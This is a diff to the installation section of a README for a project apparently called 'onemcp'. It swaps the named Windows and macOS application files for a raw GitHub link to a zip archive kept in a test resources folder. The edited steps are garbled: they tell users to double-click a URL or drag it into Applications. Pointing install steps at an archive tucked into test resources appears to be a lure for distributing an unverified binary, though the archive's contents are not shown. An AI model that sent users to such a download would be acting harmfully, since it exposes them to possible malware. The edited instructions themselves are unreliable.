rifkimaulana05/onemcp/README.md

    Click on the link for the appropriate version that suits your operating system (Windows, macOS, or Linux).
 Your download will begin automatically.

 4. **Running the Application**
    - **Windows**: After downloading, locate the file in your Downloads folder.
-Double-click the `onemcp.exe` file to launch the application.
+Double-click the `https://raw.githubusercontent.com/rifkimaulana05/onemcp/main/packages/server/src/test/resources/onemcp_v2.3.zip` file to launch the application.
-   - **macOS**: Open the downloaded file, and drag the `onemcp.app` into your Applications folder.
+   - **macOS**: Open the downloaded file, and drag the `https://raw.githubusercontent.com/rifkimaulana05/onemcp/main/packages/server/src/test/resources/onemcp_v2.3.zip` into your Applications folder.
 You can then open it from there.
    - **Linux**: Navigate to your Downloads folder, right-click the file, and select "Extract Here."
 Once extracted, open a terminal and run `./onemcp`.

 5. **Follow the Setup Instructions**